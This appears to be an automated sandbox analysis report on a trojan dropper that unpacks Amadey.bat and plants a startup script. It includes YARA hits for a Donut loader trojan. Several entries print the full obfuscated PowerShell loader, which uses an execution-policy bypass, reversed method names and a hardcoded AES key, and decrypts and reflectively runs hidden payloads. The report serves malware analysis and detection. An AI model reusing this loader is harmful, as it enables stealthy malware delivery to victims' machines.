Source: powershell.exe, 00000004.00000002.2080347912.00000000065F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2037759383.0000000005918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3266003264.0000000006BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000B.00000002.3308756546.0000000008971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2232648300.000000000935E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2214765602.00000000081D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2223463037.00000000091DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00A27AAF

Detected potential crypto function

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A292C6	0_2_00A292C6
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A37DDC	0_2_00A37DDC
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A35011	0_2_00A35011
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A462A8	0_2_00A462A8
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A35282	0_2_00A35282
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A302F7	0_2_00A302F7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A38253	0_2_00A38253
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A313FD	0_2_00A313FD
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A464D7	0_2_00A464D7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3742E	0_2_00A3742E
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A355B0	0_2_00A355B0
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4E600	0_2_00A4E600
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A307A7	0_2_00A307A7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A388AF	0_2_00A388AF
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2D833	0_2_00A2D833
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2395A	0_2_00A2395A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4EAAE	0_2_00A4EAAE
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A24A8E	0_2_00A24A8E
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A52BB4	0_2_00A52BB4
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2FCCC	0_2_00A2FCCC
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A22EB6	0_2_00A22EB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E04BD0	4_2_06E04BD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E016CD	4_2_06E016CD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E01FAD	4_2_06E01FAD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E0304D	4_2_06E0304D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E031E7	4_2_06E031E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F4C550	5_2_02F4C550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F4D6BD	5_2_02F4D6BD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F4C528	5_2_02F4C528
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F49CD0	5_2_02F49CD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08616070	5_2_08616070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0861407A	5_2_0861407A

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: String function: 00A3FFD0 appears 56 times
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: String function: 00A407A0 appears 31 times
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: String function: 00A3FEFC appears 42 times

Uses 32bit PE files

Source: jcgLYlM4dg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0000000B.00000002.3308756546.0000000008971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2232648300.000000000935E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2214765602.00000000081D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2223463037.00000000091DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@25/15@1/1

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A27727 GetLastError,FormatMessageW,

0_2_00A27727

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00A3B6D2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\startup_str_958.vbs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Command line argument: sfxname	0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Command line argument: sfxstime	0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Command line argument: STARTDLG	0_2_00A3F05C

Source: jcgLYlM4dg.exe

